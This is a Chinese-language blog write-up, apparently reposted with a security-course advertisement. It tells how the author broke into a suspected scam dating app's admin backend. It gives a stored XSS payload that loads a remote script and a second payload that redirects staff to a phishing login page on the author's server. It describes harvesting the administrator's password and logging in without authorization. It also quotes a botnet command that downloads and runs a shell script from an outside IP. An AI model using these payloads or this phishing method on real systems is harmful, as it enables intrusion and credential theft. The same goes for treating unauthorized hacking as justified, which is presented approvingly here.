黑客入侵分析某交友软件，且看黑客如何打击某诈骗交友软件

1、前言

在我们的生活中，一些人因为自己的利益而去以一方面的形式去诈骗消费者，比如说 上那些某某聊天平台，交友平台等app，其实一些都是存在违法欺骗的，下面是完整的打击这种诈骗的流程，希望各位谨慎下载，不要被诱惑所迷住了

由于病毒一方面的，在家待着无聊，所以无聊寂寞（这不是重点），一时间灵机一动去应用市场上下载了某个同城约x软件玩玩看，点开软件，首先不需要登录/注册就可以进来。。就感觉发现有问题了。

主界面是长这样的，类似探探一样可以选择心动或者忽略，忽略之后就会蹦出下一个女生的照片：

瞎划几下，就有一堆女的找我聊天，直觉告诉我这肯定是机器人：

注入点

在app的设置中心 ->之后在反馈建议处插入 xss payload：<script src=http://t.cn/EGZCvlY></script>

接收 cookie 信息

接着我这边的xss平台很快就可以接收到一些 cookie 信息，但是点开之后发现少了 JSESSIONID，无法直接登录到后台：

从中可以看见很显然是开启了 http-only：

于是我就访问一下页面：

弱口令尝试了登录不了。。爆破也没有结果，也不存在注入点。

遇到这种情况一种是两种思路：绕过 http-only 或者构造钓鱼 站，让受害者去输入账 和密码。这里我选择了后者。

首先我这里的话构造一个和登录界面一样的页面，将源码的 js、css 下载放在本地即可。

将登录处的代码的 action 改成当前目录下的 get_data.php 文件用来接收账 和密码：

get_data.php：

接着只要构造 xss payload：

<script>window.location.href="http://xxxxxx:8080/login.html"</script>

（xxxxxx 是我自己的 vps 服务器）

· 使用 php 开一个 web 服务即可：

最后的效果是这样的， 一个登录超时，让受害者重新输入密码，注入完了密码之后，重新跳转回原来正常的登录页面：

等待输入

将 xss payload 插入反馈的页面，之后等待输入即可。

客服早上 10 点才上班，我大概 9 点多的时候开启了服务，这里比较好玩的是我还抓到了别的东西：

一个美国的 ip 访问了我的服务，是一个比较奇怪的链接，仔细一看这个就是抓肉鸡的链接：

shell?cd+/tmp;wget+http://185.62.188.45/jaws.sh+-O+-+>.ske.sh;chmod+777+.ske.sh;sh+.ske.sh

搜索了一下 jaws ，这个是摄像头的一个牌子， 在 1.0 版本下的 /shell 路径存在一个命令执行漏洞，很显然这个就是批量抓肉鸡了。C2C 服务器是 185.62.188.45。

上钩

我就等啊等，到 9.58 的时候，发现那边已经访问了我的链接，应该是客服准时上班了，但是他过了几分钟也没有点击登录进来，一直在登录界面观望（没有访问 get_data.php 说明他没有输入密码），我就觉得他应该是起了疑心了吧。。。

正在我准备放弃的时候，我发现有另外一个 IP 访问了我的服务器，而且还输入了密码（怀疑这里是他发现登录不上的时候询问了管理员，管理员一顿操作直接看也不看就登录上）！！赶紧看看日志：

激动的发现就是 admin 账 ！

登录后台

拿到账 密码赶紧登录一波，看了一下果然是最高管理员的权限，并且菜单的功能还挺多的：

先习惯性看一下用户反馈，果然不出所料，肯定是一堆机器人。。。这不坑骗广大男同胞吗？

下面的一些截图也可以证明：

查询机器人的数量 11089：

正常女性用户这里是 115 名，而且不包括男性朋友选择了女性角色的情况，所以这里至少 90% 是机器人，毋庸置疑了：

另外还有一些让人惊讶的地方：

这是从 25 凌晨开始到 10 点多的订单总额，50w！！

查了一下昨天 24 的，200多w！我的天，这流水量超过了我的预期，这骗子软件有这么多人充钱，这些男性都如此饥渴嘛。。傻傻分不清是不是机器人还是真人。。

最后，如果有遇到或者下载了类似软件的朋友，希望你们不要上当，也不要被这种诱惑所迷住了，最后，祝大家生活美好。

为什么选择安界 ？

安界 贯彻人才培养理念，结合专业研发团队，打造课程内容体系，推进实训平台发展，通过一站式成长计划、推荐就业以及陪护指导的师带徒服务，为学员的继续学习和职业发展保驾护航，真正实现和完善 络安全精英的教练场平台；

关注私信‘资料’，

如果你想实现进高企、就高职、拿高薪，即使低学历也可实现职业发展中的第一个“弯道超车”！安界 就是你唯一选择，赶紧私信我！等你来！

点击关注我的头条 ，0基础掌握更多黑客秘籍

私信回复‘’资料‘’领取更多技术文章和学习资料，加入专属的安全学习圈一起进步

(脚本收集，侵删)